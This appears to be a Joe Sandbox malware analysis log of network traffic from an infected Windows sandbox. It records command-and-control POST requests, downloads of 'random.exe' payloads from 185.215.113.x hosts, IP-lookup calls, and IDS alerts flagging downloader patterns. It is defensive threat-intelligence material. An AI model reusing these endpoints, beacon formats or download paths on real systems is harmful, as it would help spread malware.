Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 36 32 31 35 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1062157001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 103.84.89.222:33791Content-Length: 2721515Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: GET /files/drainisback/random.exe HTTP/1.1Host: 185.215.113.97
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 185.215.113.97 185.215.113.97

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49709 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49710 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49713 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49711 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49722 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49748 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49758 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49762 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49765 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49773 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49772 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49768 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49766 -> 185.215.113.115:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49778 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49777 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49782 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49784 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49786 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49790 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49787 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49793 -> 185.215.113.16:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49795 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49802 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49803 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49781 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49797 -> 104.21.79.9:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49810 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49817 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49821 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49823 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49838 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49841 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49846 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49848 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49851 -> 185.215.113.97:80
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49856 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49859 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49869 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49906 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49908 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49871 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49945 -> 104.21.18.116:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49957 -> 104.21.18.116:443

Source: unknown

HTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.8:49831 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.246.45

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C55CC60 PR_Recv,

8_2_6C55CC60

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCLnKzQEIitPNARjBy8wBGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: getyour.cyouConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.8ed343c804e9069b52b4.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=A60B6144D49849D8A33BE9C2127C5E35.RefC=2025-02-01T16:19:43Z; USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; MUIDB=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.d0b81df0decfa0886dfe.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.5sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: /sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB\|\|us\|en-us\|en-us\|en\|\|cf=8\|RefA=A60B6144D49849D8A33BE9C2127C5E35.RefC=2025-02-01T16:19:43Z; USRLOC=; MUID=20AFE78358386A423C1CF20559906BCB; MUIDB=20AFE78358386A423C1CF20559906BCB; _EDGE_S=F=1&SID=039D10DD67E8639C1D4A055B669B627C; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.a01e10d026eb0e3d85f0.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.416deb762b0803a19e78.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
